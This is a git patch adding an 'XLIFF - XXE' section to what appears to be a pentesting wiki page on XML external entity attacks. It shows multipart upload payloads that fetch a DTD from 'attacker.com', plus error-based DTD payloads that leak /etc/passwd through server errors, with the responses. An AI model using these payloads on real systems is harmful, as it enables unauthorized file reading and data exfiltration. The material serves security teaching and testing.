From 7a324143568045d6464e6dccba08563926c8018d Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Tue, 20 Jul 2021 10:48:25 +0000
Subject: [PATCH] GitBook: [master] one page modified

---
 pentesting-web/xxe-xee-xml-external-entity.md | 75 +++++++++++++++++++
 1 file changed, 75 insertions(+)

diff --git a/pentesting-web/xxe-xee-xml-external-entity.md b/pentesting-web/xxe-xee-xml-external-entity.md
index 37c5a3380..aded7f527 100644
--- a/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/pentesting-web/xxe-xee-xml-external-entity.md
@@ -515,6 +515,81 @@ You can use the \[**"Encode Recipe**" of cyberchef here \]\([https://gchq.github
 <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
 ```
 
+## XLIFF - XXE
+
+This section was taken from [https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe)  
+According to the [Wikipedia](https://en.wikipedia.org/wiki/XLIFF):
+
+> XLIFF \(XML Localization Interchange File Format\) is an XML-based bitext format created to standardize the way localizable data are passed between and among tools during a localization process and a common format for CAT tool exchange.
+
+### Blind request
+
+```markup
+------WebKitFormBoundaryqBdAsEtYaBjTArl3
+Content-Disposition: form-data; name="file"; filename="xxe.xliff"
+Content-Type: application/x-xliff+xml
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE XXE [
+<!ENTITY % remote SYSTEM "http://redacted.burpcollaborator.net/?xxe_test"> %remote; ]>
+<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
+------WebKitFormBoundaryqBdAsEtYaBjTArl3--
+```
+
+The server response with an error:
+
+```javascript
+{"status":500,"error":"Internal Server Error","message":"Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."}
+```
+
+But we got a hit on Burp Collaborator.
+
+### Exfiltrating Data via Out of Band
+
+```markup
+------WebKitFormBoundaryqBdAsEtYaBjTArl3
+Content-Disposition: form-data; name="file"; filename="xxe.xliff"
+Content-Type: application/x-xliff+xml
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE XXE [
+<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]>
+<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
+------WebKitFormBoundaryqBdAsEtYaBjTArl3--
+```
+
+Based on the displayed User Agent returned by burp collaborator, it appears that it is using **Java 1.8**. One of the problems when exploiting XXE on this version of Java is **we’re unable to obtain the files containing a `New Line`** such as `/etc/passwd` using the Out of Band technique.
+
+### Exfiltrating Data via Error Based
+
+DTD File:
+
+```markup
+<!ENTITY % data SYSTEM "file:///etc/passwd">
+<!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/'>">
+%foo;
+%xxe;
+```
+
+Server Response:
+
+```javascript
+{"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"}
+```
+
+Great! The `non-exist` file is reflected in the Error messages. Next is adding the File Content.
+
+DTD File:
+
+```markup
+<!ENTITY % data SYSTEM "file:///etc/passwd">
+<!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/%data;'>">
+%foo;
+%xxe;
+```
+
+And the content of the file was successfully **printed in the output of the error sent via HTTP**.
+
 ## RSS - XEE
 
 Valid XML with RSS format to exploit an XXE vulnerability.